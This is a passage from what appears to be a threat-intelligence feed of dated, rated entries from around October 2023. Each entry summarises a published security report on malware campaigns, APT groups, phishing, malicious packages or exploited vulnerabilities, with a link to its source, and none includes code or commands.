Source: https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16
2023-10-16
Ukrainian_Providers_Are_Target_of_Destructive_Cyberattacks
LOW
Intel Source:
CERT-UA
Intel Name:
Ukrainian_Providers_Are_Target_of_Destructive_Cyberattacks
Date of Scan:
2023-10-16
Impact:
LOW
Summary:
Public sources state that between May 11, 2023, and September 27, 2023, an organized group of attackers tracked under the identifier UAC-0165 interfered with the information and communication systems (ICS) of no fewer than 11 Ukrainian telecommunications providers. Among other consequences, this disrupted the provision of services to customers.
Source: https://cert.gov.ua/article/6123309
2023-10-13
AgentTesla_attacks_via_CHM_and_PDF_Files
LOW
Intel Source:
Cyble
Intel Name:
AgentTesla_attacks_via_CHM_and_PDF_Files
Date of Scan:
2023-10-13
Impact:
LOW
Summary:
In a recent attack campaign, Cyble researchers discovered a CHM file that had been compressed using Gzip and was probably delivered by malicious spam email. The malicious CHM file acts as a lure. Based on the content of the CHM file, it targets individuals or entities working in network engineering, telecommunications, or information technology.
Source: https://cyble.com/blog/agenttesla-spreads-through-chm-and-pdf-files-in-recent-attacks/
2023-10-13
Malicious_NuGet_Package_Using_SeroXen_RAT_to_Target_DotNET_Developers
LOW
Intel Source:
Phylum
Intel Name:
Malicious_NuGet_Package_Using_SeroXen_RAT_to_Target_DotNET_Developers
Date of Scan:
2023-10-13
Impact:
LOW
Summary:
Researchers from Phylum have identified a malicious package hosted on the .NET Framework's NuGet package manager that is capable of distributing the SeroXen remote access trojan (RAT).
Source: https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/
2023-10-13
DarkGate_Allows_Attacks_Using_Teams_and_Skype
MEDIUM
Intel Source:
Trend Micro
Intel Name:
DarkGate_Allows_Attacks_Using_Teams_and_Skype
Date of Scan:
2023-10-13
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have been keeping an eye on a campaign that exploits Teams and Skype to spread the DarkGate malware to certain companies. They also found that additional payloads were delivered into the environment once DarkGate was installed on the victim's system.
Source: https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html
2023-10-13
Void_Rabisu_Targeting_Female_Political_Leaders
LOW
Intel Source:
Trend Micro
Intel Name:
Void_Rabisu_Targeting_Female_Political_Leaders
Date of Scan:
2023-10-13
Impact:
LOW
Summary:
Researchers at Trend Micro have found that Void Rabisu is still working on its primary piece of malware, the ROMCOM backdoor, nearly a year after shifting its focus from opportunistic attacks with ransomware to cyberespionage.
Source: https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html
2023-10-13
Volgmer_and_Scout_Malware_Analysis_Report_from_Lazarus_Threat_Group
LOW
Intel Source:
ASEC
Intel Name:
Volgmer_and_Scout_Malware_Analysis_Report_from_Lazarus_Threat_Group
Date of Scan:
2023-10-13
Impact:
LOW
Summary:
ASEC researchers have examined the first discovered version of the Volgmer backdoor as well as the subsequent version that started to be used in attacks in 2017. Next, we will examine the Scout downloader and discuss the dropper that was utilized for the Scout installation.
Source: https://asec.ahnlab.com/en/57685/
2023-10-12
ToddyCat_an_advanced_APT_actor
LOW
Intel Source:
Securelist
Intel Name:
ToddyCat_an_advanced_APT_actor
Date of Scan:
2023-10-12
Impact:
LOW
Summary:
ToddyCat began its malicious activity in 2020. It is a highly advanced APT group responsible for attacks against high-profile organizations in Europe and Asia. In their blog post, Securelist researchers explain the group's new toolset, the malware used to steal and exfiltrate data, and the techniques the group uses to move laterally and conduct espionage operations.
Source: https://securelist.com/toddycat-keep-calm-and-check-logs/110696/
2023-10-12
Latest_supply_chain_attack
LOW
Intel Source:
Checkmarx
Intel Name:
Latest_supply_chain_attack
Date of Scan:
2023-10-12
Impact:
LOW
Summary:
Last month, a threat actor using the handle "kohlersbtuh15" attempted to attack the open-source community by uploading a series of malicious packages to the PyPI package manager. The attacker appeared to target developers working with Aliyun services (Alibaba Cloud), Telegram, and AWS.
Source: https://checkmarx.com/blog/users-of-telegram-aws-and-alibaba-cloud-targeted-in-latest-supply-chain-attack/ https://blog.phylum.io/cloud-provider-credentials-targeted-in-new-pypi-malware-campaign/
2023-10-12
STAYIN_ALIVE_Targeting_Government_Ministries_and_Telecoms_in_Asia
MEDIUM
Intel Source:
Checkpoint
Intel Name:
STAYIN_ALIVE_Targeting_Government_Ministries_and_Telecoms_in_Asia
Date of Scan:
2023-10-12
Impact:
MEDIUM
Summary:
"Stayin' Alive" is a campaign that Check Point Research has been monitoring since at least 2021. The campaign is active in Asia and mainly targets government agencies and the telecom sector. Most of the "Stayin' Alive" toolset consists of downloaders and loaders, some of which are used as first-stage infection vectors against well-known Asian organizations.
Source: https://research.checkpoint.com/2023/stayin-alive-targeted-attacks-against-telecoms-and-government-ministries-in-asia/
2023-10-12
Hexadecimal_Notation_Addresses_Install_ShellBot_DDoS_Malware
MEDIUM
Intel Source:
ASEC
Intel Name:
Hexadecimal_Notation_Addresses_Install_ShellBot_DDoS_Malware
Date of Scan:
2023-10-12
Impact:
MEDIUM
Summary:
ASEC researchers have found that the ShellBot malware, which is being deployed on poorly maintained Linux SSH servers, has a different way of spreading. The threat actor now uses a hexadecimal value instead of a standard IP address as the download URL to install ShellBot, but the general procedure is still the same.
Source: https://asec.ahnlab.com/en/57635/
2023-10-11
AvosLocker_Ransomware_Update
HIGH
Intel Source:
CISA
Intel Name:
AvosLocker_Ransomware_Update
Date of Scan:
2023-10-11
Impact:
HIGH
Summary:
The FBI and CISA released an update to the AvosLocker advisory today to share known indicators of compromise, tactics, techniques, and procedures (TTPs), and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023.
Source: https://www.cisa.gov/sites/default/files/2023-10/aa23-284a-joint-csa-stopransomware-avoslocker-ransomware-update.pdf
2023-10-11
The_deployment_of_Mythic_Athena_Agent
LOW
Intel Source:
Cyble
Intel Name:
The_deployment_of_Mythic_Athena_Agent
Date of Scan:
2023-10-11
Impact:
LOW
Summary:
Cyble researchers recently observed a new spear phishing email targeting a leading Russian semiconductor supplier. The hackers were taking advantage of a Remote Code Execution (RCE) vulnerability, identified as CVE-2023-38831, to deliver their payload on compromised systems.
Source: https://cyble.com/blog/threat-actor-deploys-mythics-athena-agent-to-target-russian-semiconductor-suppliers/
2023-10-11
The_phishing_scams_targeting_U_S_Postal_Service_customers
LOW
Intel Source:
Krebson Security
Intel Name:
The_phishing_scams_targeting_U_S_Postal_Service_customers
Date of Scan:
2023-10-11
Impact:
LOW
Summary:
A rise in phishing scams targeting U.S. Postal Service customers has recently been observed. KrebsOnSecurity analysts concluded that an extensive SMS phishing operation is attempting to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.
Source: https://krebsonsecurity.com/2023/10/phishers-spoof-usps-12-other-natl-postal-services/
2023-10-11
Distributing_Infostealer_with_Abnormal_Certificate
LOW
Intel Source:
ASEC
Intel Name:
Distributing_Infostealer_with_Abnormal_Certificate
Date of Scan:
2023-10-11
Impact:
LOW
Summary:
Malware carrying abnormal certificates has been spreading rapidly of late. Malware frequently imitates legitimate certificates; in this instance, however, the malware inserted random certificate information, leaving unusually long strings in the Subject Name and Issuer Name fields.
Source: https://asec.ahnlab.com/en/57553/
2023-10-11
The_distribution_of_new_spotted_AgentTesla_Infostealer
LOW
Intel Source:
Ciberdefensa
Intel Name:
The_distribution_of_new_spotted_AgentTesla_Infostealer
Date of Scan:
2023-10-11
Impact:
LOW
Summary:
ASEC has discovered the AgentTesla Infostealer that was distributed through an email in the form of a malicious BAT file.
Source: https://ciberdefensa.cat/archivos/26103
2023-10-11
An_increase_usage_of_phishing_emails_containing_malicious_QR
LOW
Intel Source:
AT&T
Intel Name:
An_increase_usage_of_phishing_emails_containing_malicious_QR
Date of Scan:
2023-10-11
Impact:
LOW
Summary:
Over the last couple of months, AT&T SOC analysts have observed an increase in the use of phishing emails containing malicious QR codes. As one example, a customer targeted by such a phishing attempt provided the AT&T analysts with an email that had been circulated to several of its internal users.
Source: https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-quishing-combatting-embedded-malicious-qr-codes
2023-10-10
An_Unknown_Threat_Actor_Targeting_Several_Taiwanese_Organizations
LOW
Intel Source:
Symantec
Intel Name:
An_Unknown_Threat_Actor_Targeting_Several_Taiwanese_Organizations
Date of Scan:
2023-10-10
Impact:
LOW
Summary:
A previously unidentified advanced persistent threat (APT) group used proprietary malware and other publicly available tools to target businesses in Taiwan's manufacturing, IT, and biomedical industries. Organizations in Vietnam and the United States, as well as a Pacific Islands government agency, also appear to have been targeted as part of this operation. The activity began in February 2023 and was ongoing until at least May 2023.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks
2023-10-10
Targets_on_unpatched_tagDiv_plugin
LOW
Intel Name:
Targets_on_unpatched_tagDiv_plugin
Date of Scan:
2023-10-10
Impact:
LOW
Summary:
Sucuri's research team observed new waves of Balada malware injections on websites that were actively using tagDiv themes. Sucuri shared its examination of these waves of the ongoing, massive Balada Injector campaign. It also provided technical details of the injected scripts found in each wave, exploring their functionality and the potential dangers they pose to site administrators.
Source: https://blog.sucuri.net/2023/10/balada-injector-targets-unpatched-tagdiv-plugin-newspaper-theme-wordpress-admins.html
2023-10-10
RCE_Campaign_Hacks_Routers_Into_Botnets
LOW
Intel Source:
Fortinet
Intel Name:
RCE_Campaign_Hacks_Routers_Into_Botnets
Date of Scan:
2023-10-10
Impact:
LOW
Summary:
A campaign called IZ1H9 has intensified its development of malware targeting a variety of unpatched routers and IoT devices, adding them to a growing botnet used to perform targeted DDoS attacks. FortiGuard Labs researchers discovered the campaign, which recently added 13 new payloads exploiting vulnerabilities in Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix JetWave, and Totolink routers, as well as known vulnerabilities in D-Link devices, Netis wireless routers, Sunhillo SureLine, and Geutebruck IP cameras.
Source: https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits
2023-10-10
New_Magecart_Campaign_Exploits_404_Pages
LOW
Intel Source:
Akamai
Intel Name:
New_Magecart_Campaign_Exploits_404_Pages
Date of Scan:
2023-10-10
Impact:
LOW
Summary:
According to the Akamai Security Intelligence Group, a Magecart web skimming campaign is targeting many websites, including those of large companies in the food and retail industries. The campaign stands out for its three sophisticated concealment techniques, one of which Akamai had never seen before and which presents particular difficulties for detection and mitigation: modifying the website's normal 404 error page to hide the malicious code.
Source: https://www.akamai.com/blog/security-research/magecart-new-technique-404-pages-skimmer
2023-10-10
Infostealer_Distributing_via_Spam_Email
LOW
Intel Source:
ASEC
Intel Name:
Infostealer_Distributing_via_Spam_Email
Date of Scan:
2023-10-10
Impact:
LOW
Summary:
ASEC researchers have spotted the AgentTesla Infostealer distributing via an email in the form of a malicious BAT file. When the BAT file is executed, it employs the fileless method to run AgentTesla (EXE) without creating the file on the user’s PC. This blog post will provide an explanation of the distribution process, from the spam email to the final binary (AgentTesla), along with related techniques.
Source: https://asec.ahnlab.com/en/57546/
2023-10-09
UAC_0006_Group_Using_SmokeLoader_Malware
MEDIUM
Intel Source:
CERT-UA
Intel Name:
UAC_0006_Group_Using_SmokeLoader_Malware
Date of Scan:
2023-10-09
Impact:
MEDIUM
Summary:
CERT-UA researchers have identified at least four waves of cyberattacks carried out by the UAC-0006 group using the SmokeLoader malware. The emails are sent from legitimate compromised email addresses, and SmokeLoader is delivered to computers in several ways.
Source: https://cert.gov.ua/article/6032734
2023-10-09
Examining_the_Snake_Keylogger
LOW
Intel Source:
https://any.run/cybersecurity-blog/analyzing-snake-keylogger/
Intel Name:
Examining_the_Snake_Keylogger
Date of Scan:
2023-10-09
Impact:
LOW
Summary:
Researchers from AnyRun have examined the Snake Keylogger, an information-stealing malware written in .NET. It was first identified in November 2020 and is also known as Snake, 404 Keylogger, and 404KeyLogger. The Snake Keylogger collects the victim's saved passwords, clipboard contents, keystrokes, and screenshots, among other information.
Source: https://any.run/cybersecurity-blog/analyzing-snake-keylogger/
2023-10-09
Harvesting_of_Credentials_For_NetScaler_Gateway
LOW
Intel Source:
IBM Security Intelligence
Intel Name:
Harvesting_of_Credentials_For_NetScaler_Gateway
Date of Scan:
2023-10-09
Impact:
LOW
Summary:
Attackers were using the CVE-2023-3519 vulnerability to target unpatched NetScaler Gateways in September 2023 and inject a malicious script into the HTML code of the authentication web page in order to capture user credentials. The effort is yet another illustration of how cybercriminals' interest in credentials has grown. According to the 2023 X-Force cloud threat report, stolen credentials were used in 67% of cloud-related incident response engagements.
Source: https://securityintelligence.com/posts/x-force-uncovers-global-netscaler-gateway-credential-harvesting-campaign/
2023-10-07
The_exploit_of_a_vulnerability_in_WinRAR
LOW
Intel Source:
Cyble
Intel Name:
The_exploit_of_a_vulnerability_in_WinRAR
Date of Scan:
2023-10-07
Impact:
LOW
Summary:
Cyble researchers observed a RAR archive file on VirusTotal on October 3rd. The file, which may be encountered through adult websites or fake adult sites, exploits a WinRAR vulnerability (CVE-2023-38831). In this malware campaign, the vulnerability is used to deliver various malicious payloads to the victim's system and infect it with several malware types, such as Apanyan Stealer, Murk-Stealer, and AsyncRAT.
Source: https://cyble.com/blog/winrar-vulnerability-puts-illicit-content-consumers-at-risk-of-apanyan-stealer-murk-stealer-asyncrat/
2023-10-06
Diving_Deep_into_Dark_Pink_APT_Group
LOW
Intel Source:
SOC Radar
Intel Name:
Diving_Deep_into_Dark_Pink_APT_Group
Date of Scan:
2023-10-06
Impact:
LOW
Summary:
SOCRadar researchers have delved into the intricate details of the Dark Pink APT group, shedding light on its campaigns, its targets, and the security measures one can adopt to defend against its malicious activity.
Source: https://socradar.io/apt-profile-dark-pink-apt-group/
2023-10-06
New_wave_of_Mirai_Botnet
MEDIUM
Intel Source:
Nsfocus
Intel Name:
New_wave_of_Mirai_Botnet
Date of Scan:
2023-10-06
Impact:
MEDIUM
Summary:
The NSFOCUS threat hunting system observed new botnet variant families tied to Mirai. These families, hailBot, kiraiBot and catDDoS, are very active and have already spread widely, making them a growing threat. In this article, NSFOCUS discloses the technical details of these three new Mirai variants and the data monitored by its global threat hunting system.
Source: https://nsfocusglobal.com/mirai-botnets-new-wave-hailbot-kiraibot-catddos-and-their-fierce-onslaught/?web_view=true
2023-10-06
Examining_Uses_of_ProjFUD_Injector_and_HTML_Smuggling_to_Deploy_AsyncRAT
LOW
Intel Source:
eSentire
Intel Name:
Examining_Uses_of_ProjFUD_Injector_and_HTML_Smuggling_to_Deploy_AsyncRAT
Date of Scan:
2023-10-06
Impact:
LOW
Summary:
Researchers from eSentire determined that the VBS file in question is malicious: it contains the code that retrieves AsyncRAT. The user received a phishing email with an .htm file attached. This method, known as HTML smuggling, has previously been used by malware strains including Qakbot and AsyncRAT.
Source: https://www.esentire.com/blog/investigating-asyncrat-deployment-via-projfud-injector-and-html-smuggling
2023-10-06
Attacks_Involving_an_Adversary_in_the_Middle_Have_Increased
LOW
Intel Source:
eSentire
Intel Name:
Attacks_Involving_an_Adversary_in_the_Middle_Have_Increased
Date of Scan:
2023-10-06
Impact:
LOW
Summary:
Researchers from eSentire have noticed an uptick in adversary-in-the-middle (AitM) phishing attacks since mid-September 2023. AitM phishing attacks use social engineering to trick end users into clicking on dangerous links in emails. Then, data is proxied or routed through infrastructure under the control of the attacker, which results in the theft of user credentials, including session cookies and Multi-Factor Authentication (MFA) codes that would allow access to various accounts. This access has been used to carry out Business Email Compromise (BEC) attacks.
Source: https://www.esentire.com/security-advisories/increase-in-adversary-in-the-middle-phishing-attacks
2023-10-06
Analysis_of_LostTrust_Ransomware
LOW
Intel Source:
Sentinelone
Intel Name:
Analysis_of_LostTrust_Ransomware
Date of Scan:
2023-10-06
Impact:
LOW
Summary:
SentinelOne researchers examined the ransomware and provided a high-level technical breakdown of where various ransomware families and their modes of operation overlap. In addition to analyzing the LostTrust payload's behavior, they compared its artifacts with those of the SFile and Mindware families.
Source: https://www.sentinelone.com/blog/losttrust-ransomware-latest-multi-extortion-threat-shares-traits-with-sfile-and-mindware/
2023-10-05
A_Typosquatting_Operation_Using_NPM_to_Distribute_r77_Rootkit
LOW
Intel Source:
ReversingLabs
Intel Name:
A_Typosquatting_Operation_Using_NPM_to_Distribute_r77_Rootkit
Date of Scan:
2023-10-05
Impact:
LOW
Summary:
Researchers from ReversingLabs have discovered a fresh supply chain attack targeting the npm platform. The typosquatting campaign first surfaced in August, pushing a malicious package called node-hide-console-windows that downloaded a Discord bot, which in turn made it easier to install the open source r77 rootkit.
Source: https://www.reversinglabs.com/blog/r77-rootkit-typosquatting-npm-threat-research
2023-10-05
The_distribute_of_Ransom_Knight_malware_by_Qakbot_actors
MEDIUM
Intel Source:
Talos
Intel Name:
The_distribute_of_Ransom_Knight_malware_by_Qakbot_actors
Date of Scan:
2023-10-05
Impact:
MEDIUM
Summary:
Talos is confident that, even though the FBI seized Qakbot infrastructure in August, the threat actors behind Qakbot remain active and started a new campaign just before the takedown, distributing a variant of Cyclops/Ransom Knight ransomware along with the Remcos backdoor. Talos observed this new activity by connecting the metadata in the LNK files used in the new campaign to the machines used in previous Qakbot campaigns.
Source: https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/
2023-10-05
Exposing_Infection_Methods_Across_Supply_Chains_and_Codebases
LOW
Intel Source:
Trend Micro
Intel Name:
Exposing_Infection_Methods_Across_Supply_Chains_and_Codebases
Date of Scan:
2023-10-05
Impact:
LOW
Summary:
Researchers from Trend Micro examined case studies in which threat actors copied legitimate GitHub repositories (such as Binance-trading-bot, Crypto-clipper, Telegram-mass-dm, USDT-Sweeper, Discord-boost-tool, and others written in Python 3), trojanized them, and infected them with malicious code while strategically stuffing their repository description sections with keywords to increase their visibility in GitHub searches.
Source: https://www.trendmicro.com/en_us/research/23/j/infection-techniques-across-supply-chains-and-codebases.html
2023-10-05
DinodasRAT_Hits_a_Governmental_Organization_in_Guyana
MEDIUM
+
Intel Source:
welivesecurity
Intel Name:
DinodasRAT_Hits_a_Governmental_Organization_in_Guyana
Date of Scan:
2023-10-05
Impact:
MEDIUM
Summary:
As part of Operation Jacana, a cyber espionage operation, a government agency in Guyana has been attacked. The activity involved a spear-phishing attack that resulted in the deployment of a previously undocumented implant named DinodasRAT, which was built in C++. ESET discovered the activity in February 2023.
Source: https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/
2023-10-05
A_cyber_espionage_campaign_with_use_of_a_variant_of_HyperBro_loader
LOW
+
Intel Source:
Eclecticiq
Intel Name:
A_cyber_espionage_campaign_with_use_of_a_variant_of_HyperBro_loader
Date of Scan:
2023-10-05
Impact:
LOW
Summary:
EclecticIQ analysts detected a cyber espionage campaign. The threat actors used a HyperBro loader variant with a lure themed on Taiwan Semiconductor Manufacturing Company (TSMC). It targeted the semiconductor industry in Mandarin-speaking East Asian regions (Taiwan, Hong Kong, Singapore).
Source: https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia
2023-10-04
US_Postal_Service_Smishing_Campaign_analysis
LOW
+
Intel Source:
Domain Tools
Intel Name:
US_Postal_Service_Smishing_Campaign_analysis
Date of Scan:
2023-10-04
Impact:
LOW
Summary:
Recently, a spike of phishing emails and smishing text messages was observed in campaigns targeting the US Postal Service (USPS) as an institution,
Source: https://www.domaintools.com/resources/blog/return-to-sender-a-brief-analysis-of-a-us-postal-service-smishing-campaign/
2023-10-04
RMS_Phishing_campaign_comeback
LOW
+
Intel Source:
Cyble
Intel Name:
RMS_Phishing_campaign_comeback
Date of Scan:
2023-10-04
Impact:
LOW
Summary:
The Cyble Research team discovered a phishing campaign targeted at Russian users, in which threat actors (TAs) created phishing websites imitating popular apps such as ExpressVPN, WeChat, and Skype. All of these applications are inaccessible in Russia due to nationwide restrictions.
Source: https://cyble.com/blog/rms-tools-sneaky-comeback-phishing-campaign-mirroring-banned-applications/
2023-10-04
EvilProxy_Phishing_Attack_Strikes_Indeed
LOW
+
Intel Source:
Menlo Security
Intel Name:
EvilProxy_Phishing_Attack_Strikes_Indeed
Date of Scan:
2023-10-04
Impact:
LOW
Summary:
Menlo Labs have discovered a phishing campaign that targets senior-level executives in a variety of businesses, but especially those in the banking and financial services, insurance, property management, and manufacturing sectors.
Source: https://www.menlosecurity.com/blog/evilproxy-phishing-attack-strikes-indeed/
2023-10-04
The_Emergence_of_Recurring_Python_Threat
LOW
+
Intel Source:
Checkmarx
Intel Name:
The_Emergence_of_Recurring_Python_Threat
Date of Scan:
2023-10-04
Impact:
LOW
Summary:
Researchers from Checkmarx have seen that from the beginning of April 2023, an attacker has been continuously deploying hundreds of malicious packages under different usernames, racking up close to 75,000 downloads. With changes from plain-text to encryption, multilevel obfuscation, and secondary disassembly payloads, the attacker's progression is clear.
Source: https://checkmarx.com/blog/the-evolutionary-tale-of-a-persistent-python-threat/
2023-10-03
WS_FTP_Server_critical_vulnerabilities_in_the_wild
MEDIUM
+
Intel Source:
Rapid7
Intel Name:
WS_FTP_Server_critical_vulnerabilities_in_the_wild
Date of Scan:
2023-10-03
Impact:
MEDIUM
Summary:
Progress Software first disclosed the WS_FTP Server vulnerabilities in its advisory; two of them are critical (CVE-2023-40044 and CVE-2023-42657). The most severe appears to be the .NET deserialization vulnerability (CVE-2023-40044), and Rapid7 confirmed that it is exploitable with a single HTTPS POST request and a pre-existing ysoserial.net gadget. As of September 30, Rapid7 has observed multiple instances of WS_FTP exploitation in the wild and provided details of this activity in the Observed Attacker Behavior section of their blog.
Source: https://www.rapid7.com/blog/post/2023/09/29/etr-critical-vulnerabilities-in-ws_ftp-server/
2023-10-03
A_discovery_of_several_malicious_packages_hidden_in_NPM
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
A_discovery_of_several_malicious_packages_hidden_in_NPM
Date of Scan:
2023-10-03
Impact:
MEDIUM
Summary:
Over the last couple of months, the Fortinet team discovered several malicious packages hidden in NPM. Such packages have been found across various ecosystems, e.g. PyPI and NPM. In this blog, we will look at some of these packages, grouping them based on similar styles of code or functions. Every NPM package that was discovered aims to steal sensitive data, such as system or user information, via a webhook or file-sharing link.
Source: https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm
2023-10-02
PurpleFox_campaign_resurfaces_again
LOW
+
Intel Source:
Cyble
Intel Name:
PurpleFox_campaign_resurfaces_again
Date of Scan:
2023-10-02
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs (CRIL) came across a Word document file that spreads via spam email, employing an infection method for disseminating PurpleFox malware.
Source: https://cyble.com/blog/purplefox-resurfaces-via-spam-emails-a-look-into-its-recent-campaign/
2023-10-02
The_Murk_Stealer_an_open_source_stealer_details
LOW
+
Intel Source:
Cyfirma
Intel Name:
The_Murk_Stealer_an_open_source_stealer_details
Date of Scan:
2023-10-02
Impact:
LOW
Summary:
Cyfirma shared a full analysis report of “The-Murk-Stealer;” an open-source stealer. Their report shows the details of “The-Murk-Stealer,” a malicious tool that can discreetly infiltrate systems to collect sensitive information.
Source: https://www.cyfirma.com/outofband/the-thin-line-educational-tools-vs-malicious-threats-a-focus-on-the-murk-stealer/
2023-10-02
A_new_Malware_threat_BunnyLoader
LOW
+
Intel Source:
Zscaler
Intel Name:
A_new_Malware_threat_BunnyLoader
Date of Scan:
2023-10-02
Impact:
LOW
Summary:
Zscaler threat researchers observed a new Malware-as-a-Service, “BunnyLoader”, which is being sold on various forums. BunnyLoader has many capabilities, such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more.
Source: https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
2023-09-30
The_CL0P_ransomware_group_recent_activity
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
The_CL0P_ransomware_group_recent_activity
Date of Scan:
2023-09-30
Impact:
MEDIUM
Summary:
Source: https://unit42.paloaltonetworks.com/cl0p-group-distributes-ransomware-data-with-torrents/
2023-09-29
Ad_Serving_Malicious_Content_Inside_Bing_AI_Chatbot
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Ad_Serving_Malicious_Content_Inside_Bing_AI_Chatbot
Date of Scan:
2023-09-29
Impact:
LOW
Summary:
Researchers from Malwarebytes have discovered a method through which consumers looking for software downloads can be persuaded to visit fraudulent websites and download malware straight from a Bing Chat conversation.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/09/malicious-ad-served-inside-bing-ai-chatbot
2023-09-29
APT34_Launches_Phishing_Attack_With_New_Malware
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
APT34_Launches_Phishing_Attack_With_New_Malware
Date of Scan:
2023-09-29
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have detected and tracked the advanced persistent threat (APT) group APT34 using a new malware variant, comparable to the SideTwist backdoor, in conjunction with a phishing campaign. In this campaign, the group went after a victim in Saudi Arabia using a bogus license registration form purporting to come from an African government agency.
Source: https://www.trendmicro.com/en_us/research/23/i/apt34-deploys-phishing-attack-with-new-malware.html
2023-09-29
Analyses_of_Netscaler_exploitation
LOW
+
Intel Source:
Huntress
Intel Name:
Analyses_of_Netscaler_exploitation
Date of Scan:
2023-09-29
Impact:
LOW
Summary:
Huntress routinely performs periodic threat hunting across monitored endpoints for suspicious activity not previously identified through existing detections. Recently, while monitoring this activity, Huntress researchers observed strange processes in several monitored environments. These reflected reconnaissance activity consistent with adversary tradecraft: executing built-in commands such as whoami.exe, tasklist with various flags, ipconfig, and ping.
Source: https://www.huntress.com/blog/netscaler-exploitation-to-social-engineering-mapping-convergence-of-adversary-tradecraft-across-victims
2023-09-29
Sample_of_Infostealer_malware_that_is_in_the_wild
LOW
+
Intel Source:
ISC. SANS
Intel Name:
Sample_of_Infostealer_malware_that_is_in_the_wild
Date of Scan:
2023-09-29
Impact:
LOW
Summary:
An ISC.SANS researcher spotted and analyzed a new "Infostealer" malware in the wild. He is concerned that people are still storing passwords in plain-text files.
Source: https://isc.sans.edu/diary/rss/30262
2023-09-29
Reports_on_new_malwares_and_loaders
LOW
+
Intel Source:
Securelist
Intel Name:
Reports_on_new_malwares_and_loaders
Date of Scan:
2023-09-29
Impact:
LOW
Summary:
Securelist published their report on new ASMCrypt malware (related to the DoubleFinger loader) and also published reports on new versions of the Lumma stealer and Zanubis Android banking trojan.
Source: https://securelist.com/crimeware-report-asmcrypt-loader-lumma-stealer-zanubis-banker/110512/
2023-09-29
Analyzes_of_a_Lazarus_attack_on_employees_of_an_aerospace_company
LOW
+
Intel Source:
Welivesecurity
Intel Name:
Analyzes_of_a_Lazarus_attack_on_employees_of_an_aerospace_company
Date of Scan:
2023-09-29
Impact:
LOW
Summary:
ESET researchers observed a Lazarus attack on an aerospace company in Spain, in which the attackers deployed several tools, most notably a previously undocumented backdoor that ESET named LightlessCan.
Source: https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/
2023-09-29
Johnson_Controls_International_suffered_a_ransomware_attack
MEDIUM
+
Intel Source:
Security Affairs
Intel Name:
Johnson_Controls_International_suffered_a_ransomware_attack
Date of Scan:
2023-09-29
Impact:
MEDIUM
Summary:
Johnson Controls International announced that it suffered a massive ransomware attack that encrypted many of the company's devices, including VMware ESXi servers, impacting the operations of the company and its subsidiaries.
Source: https://securityaffairs.com/151636/cyber-crime/dark-angels-team-ransomware-group-hit-johnson-controls.html
2023-09-28
Dependabot_carrying_malicious_code
LOW
+
Intel Source:
Checkmarx
Intel Name:
Dependabot_carrying_malicious_code
Date of Scan:
2023-09-28
Impact:
LOW
Summary:
Checkmarx recently observed that their scanners detected atypical commits carrying malicious code in hundreds of GitHub repositories. The commit messages were crafted by threat actors to appear as Dependabot automated contributions in the commit history, in an attempt to disguise the malicious activity.
Source: https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/
2023-09-28
Diving_Deep_into_Brute_Ratel_C4_Payloads
LOW
+
Intel Source:
Cyber Geeks
Intel Name:
Diving_Deep_into_Brute_Ratel_C4_Payloads
Date of Scan:
2023-09-28
Impact:
LOW
Summary:
An alternative to Cobalt Strike is the Red Team & Adversary Simulation program Brute Ratel C4. A technical investigation of a Brute Ratel badger/agent that doesn't use all the most recent aspects of the framework has been presented by researchers.
Source: https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads-part-2/
2023-09-28
A_Spearphishing_Campaign_Exploits_the_Azerbaijan_Armenia_Conflict
LOW
+
Intel Source:
Fortinet
Intel Name:
A_Spearphishing_Campaign_Exploits_the_Azerbaijan_Armenia_Conflict
Date of Scan:
2023-09-28
Impact:
LOW
Summary:
Last month, FortiGuard Labs spotted a malicious memo purporting to be from the president of a company in Azerbaijan and targeting the management teams of associated businesses. When opened, the memo downloaded malware designed to collect basic information from its targets. The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive.
Source: https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia
2023-09-28
Budworm_APT_Group_Attacks_Government_and_Telecoms_Organizations
MEDIUM
+
Intel Source:
Symantec
Intel Name:
Budworm_APT_Group_Attacks_Government_and_Telecoms_Organizations
Date of Scan:
2023-09-28
Impact:
MEDIUM
Summary:
Researchers from Symantec have discovered that the Budworm advanced persistent threat (APT) group is still actively developing its toolkit. Additionally, it was determined that Budworm was targeting an Asian government and a Middle Eastern telecom company with an upgraded version of one of its main tools.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-tool-update-telecoms-govt
2023-09-28
New_Move_of_Ransomware_Ransomed_vc_Operators
LOW
+
Intel Source:
Resecurity
Intel Name:
New_Move_of_Ransomware_Ransomed_vc_Operators
Date of Scan:
2023-09-28
Impact:
LOW
Summary:
